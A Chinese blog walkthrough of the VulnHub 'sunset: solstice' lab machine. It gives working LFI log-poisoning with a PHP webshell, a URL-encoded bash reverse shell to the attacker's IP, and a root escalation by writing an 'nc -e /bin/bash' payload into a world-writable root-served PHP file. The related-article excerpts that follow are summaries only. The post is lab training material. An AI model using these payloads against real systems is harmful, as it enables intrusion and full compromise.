vulnhub sunset: solstice

最新推荐文章于 2023-10-11 19:44:35 发布
最新推荐文章于 2023-10-11 19:44:35 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: access.log LFI php nc -e
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/elephantxiang/article/details/126335716
版权

渗透思路:

nmap扫描端口 ---- 利用LFI和apache访问日志getshell ---- 利用可写的本地http服务php文件提权

环境信息:

靶机:192.168.101.97

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.97

扫描到一堆端口,大部分都是兔子洞

2、利用LFI和apache访问日志getshell

访问http://192.168.101.97:8593/,然后点一下Book List,发现url变成http://192.168.101.97:8593/index.php?book=list

用/etc/passwd来尝试以上url是否有LFI漏洞,访问http://192.168.101.97:8593/index.php?book=../../../../etc/passwd,读取到了/etc/passwd的内容

接着由于nmap扫描出80端口是apache httpd 2.4.38,所以在网上找到apache2的访问日志可能保存的文件路径,挨个进行文件包含看看访问日志到底保存在哪里,最后发现在/var/log/apache2/access.log

(下图为访问http://192.168.101.97:8593/index.php?book=../../../../var/log/apache2/access.log)

接下来尝试往access.log中写入payload:

用nc访问靶机的80端口

nc 192.168.101.97 80

然后发送

GET <?php system($_GET[xiannv]); ?> HTTP/1.1

得到上图的结果后,再次访问http://192.168.101.97:8593/index.php?book=../../../../var/log/apache2/access.log,可以看到一条GET后面内容不显示的访问日志,这就说明payload写入成功了

攻击机上nc监听8888端口

nc -nlvp 8888

接下来浏览器访问如下url,触发反弹shell:

http://192.168.101.97:8593/index.php?book=../../../../var/log/apache2/access.log&xiannv=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%31%2e%33%34%2f%38%38%38%38%20%3c%26%31%27

其中url编码部分的内容是:

bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1'

得到靶机www-data用户的反弹shell

在反弹shell中输入如下命令可以得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

3、利用可写的本地http服务php文件提权

查找所有拥有suid的文件和目录

find / -user root -perm /4000 2>/dev/null

发现个奇怪的目录/var/tmp/sv

进入该目录后,发现该目录下有个所有用户可读写的index.php,属主是root

可以通过写入payload并访问该站点下的index.php文件达到获取某个用户反弹shell的目的。不过首先需要确认三点:

1、/var/tmp/sv是哪个站点可以访问的目录

2、站点的启动者是什么权限

3、如何构造payload

首先,查看哪个站点可以访问/var/tmp/sv

ps -ef | grep sv

发现本地57端口上的http服务的根目录是/var/tmp/sv,并且启动者是root用户

关于php命令的参数解释可以看下图

然后执行nc -help发现支持-e参数

于是可以在/var/tmp/sv/index.php中写入payload:<?php system('nc 192.168.101.34 9999 -e /bin/bash'); ?>

echo "<?php system('nc 192.168.101.34 9999 -e /bin/bash'); ?>" > index.php

攻击机上监听9999端口

nc -nlvp 9999

靶机上访问本地57端口

nc 127.0.0.1 57

然后访问index.php

GET /index.php HTTP/1.1

再多按一次回车

即可得到root用户的反弹shell

分别在/home/miguel和/root下找到两个flag

OSCP-1-7-solstice(本地文件包含,User-Agent利用修改webshell、apache2日志中毒、root权限文件修改文件内容、修改SUID工具提权、find提权)
墨痕诉清风的博客
08-10 133
1. 利用root权限进程,修改文件内容执行修改find命令权限,再利用find命令提权。1. 利用root权限进程,修改文件内容执行修改find命令权限,再利用find命令提权。2. 直接写入php反弹shell,访问及执行回弹。2. 直接写入php反弹shell,访问及执行回弹。tmp/sv下root权限启动,且有写权限。查找root权限可写的文件其它用户可以写。查找root用户权限启动的程序。修改user-agent。.........
SO SIMPLE: 1靶机
logan_logan的博客
07-22 364
1.在浏览器输入地址打开 2.端口扫描 nmap -A -p- -T4 10.36.101.171 开的端口不是很多,不过可以看到8443端口后面包含有LXD的信息,说不定在提权的时候能用到; 3.目录枚举 目录枚举的时候看到有wordpress,准备上Wpscan工具进行枚举; 4.在网页打开这个目录 查看源代码的时候发现Social Warfare竟然是3.5版本的,判断很可能出现Social Warfare <= 3.5.2 - Unauthenticated Remote Code
VulnHub靶场sunset:noontide
A_dmin的博客
09-30 1280
VulnHub靶场sunset:noontide nmap扫描主机存活: 扫描端口,开放三个端口: emmm,irc是什么服务啊,就很迷,,百度搜索一波,,,好像是一个类似于网络聊天啥的东西 不太会啊,也没玩过这个,,,,直接searchsploit搜索一下版本好像是unreal: 还真有!使用第三个,,,,先下载到本地 使用msfvenom生成payload: 复制如上payload,打开13853.pl更改payload,一开始有五行直接删除其余四行,更改第一行: 然后保存运行: 监听4
vulnhub靶机Solstice
m0_73248913的博客
08-30 166
vulnhub靶机
vulnhub靶机-sunset:sunrise
臭nana的博客
07-19 1292
1、找到靶机ip:192.168.0.128 nma -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -p- -A 192.168.0.128 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.128 Host is up (0.00044s latency). Not shown: 65531 closed ports PORT STATE SERVIC
VulnHub】【2023年07月18日】最新全部靶场详情(上)
热门推荐
惟忆
07-18 1万+
【代码】【VulnHub】【2023年07月18日】最新全部靶场详情(上)
实战打靶集锦-014-solstice
阿尔泰野狼的博客
04-05 640
本文记录了博主一次不成功的打靶经历。
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1372
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1198
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
Vulnhub:SUNSET-DAWN靶机
logan_logan的博客
06-06 644
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 发现开启了samba服务,接下来对samba服务进行枚举; nmap -p- 192.168.31.130 nmap -sC -sV -p 139,445,3306,12345 192.168.31.130 对samba服务枚举得时候发现了ITDEPT共享目录,不需要密码就可以登录 enum4linux -a -o 192.168.31.130 登录samba后,发现并没有文件存在,但是这个目录可以上传文件; smbclient
ConcreteStructs.jl::love_hotel::house::cityscape_at_dusk::hotel::sunset::bank:
02-17
ConcreteStructs.jl ConcreteStructs.jl导出宏@concrete ,该宏可用于使非混凝土结构混凝土,而无需添加类型参数的样板。 using ConcreteStructs @concrete struct AB a b end julia> ab = AB("hi", 1+im) ...
solstice靶机练习
weixin_62391735的博客
06-11 387
pkexec这个版本在google上可以搜到CVE-2021-4034这个提权漏洞,exim4这个版本没有搜到漏洞,所以我们使用CVE-2021-4034这个漏洞来进行提权。在这里我们就要给文件中写入反弹shell的脚本了,因为靶机自带的nc-e参数,就不需要我们去构建一些反弹的shell了。并没有发现什么有用的东西,大部分都是403,还有一个jquery也没有什么异常,换一个端口看看。发现这个靶机开放的端口也是比较多的,我们进行细致的扫描来看看。将这个反弹shell写入文件中,我们去访问57端口。
solstice靶机渗透测试
最新发布
m0_74358546的博客
10-11 138
开启靶机之后扫描网段内的主机确定靶机IP为192.168.153.140nmap扫描一下开放的端口开放的端口挺多的一个端口一个端口的试一下。
[web攻防] Apache shiro反序化漏洞 CVE-2016-4437 学习过程 vulhub搭建靶场+ShiroExploit工具使用
AAAAAAAAAAAA66的博客
01-10 2747
中华人民共和国网络安全法(出版物)_360百科 写在前面 由于自己是刚从PHP反序化学到java反序化的,虽然这些漏洞的成因都是一个—— 输入的代码被执行,但是到底要经历一个怎样的调用过程才会导致代码被执行,这才是我们需要弄懂的地方,也是脚本小子进阶的过程。。 本文仅是记录自己学习的过程的总结。 参考链接 HW必备知识点! Shiro反序列化的检测与利用_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度. ubuntu安装vulhub教程_winter_solsti...
【渗透测试】SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞
serendipity1130的博客
09-03 866
一、信息收集: arp-scan -l nmap -sS -sV -T5 -p- 192.168.225.190 dirb http://192.168.225.190 //无有效目录 2.根据端口扫描信息,可以看到开放了邮件接收pop3服务,4555端口开放的是james-admin服务,进行远程查看: telnet 192.168.225.190 4555 //使用root root密码进行登录 help //查看指令 listusers //列用户名 setpassword mindy
冬至(Winter Solstice
weixin_33883178的博客
12-21 382
冬至,是我国农历中一个非常重要的节气[1],也是我国汉族一个传统节日,至今仍有不少地方有过冬至节的习俗。冬至俗称“冬节”、“长至节”、“亚岁”等。早在二千五百多年前的春秋时代,我国已经用土圭观测太阳测定出冬至来了,它是二十四节气中最早制订出的一个。时间在每年的阳历12月21日至23日之间。   冬至是北半球全年中白天最短、黑夜最长的一天,过了冬至,白天就会一天天变长。古人...
apache access.log 中无内容问题备忘
金戈铁马
03-21 1099
今天在ubuntu 中安装了 apache2 之后,访问页面,但是access.log 没有任何内容。 解决方法: 在 /etc/apache2/apache2.conf 中添加了以下行后,问题解决: 添加后 access.log中可以正常显示访问的日志信息: ...
PG::Solstice
aya3t的博客
11-29 290
PROVING GROUNDS::Solstice
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值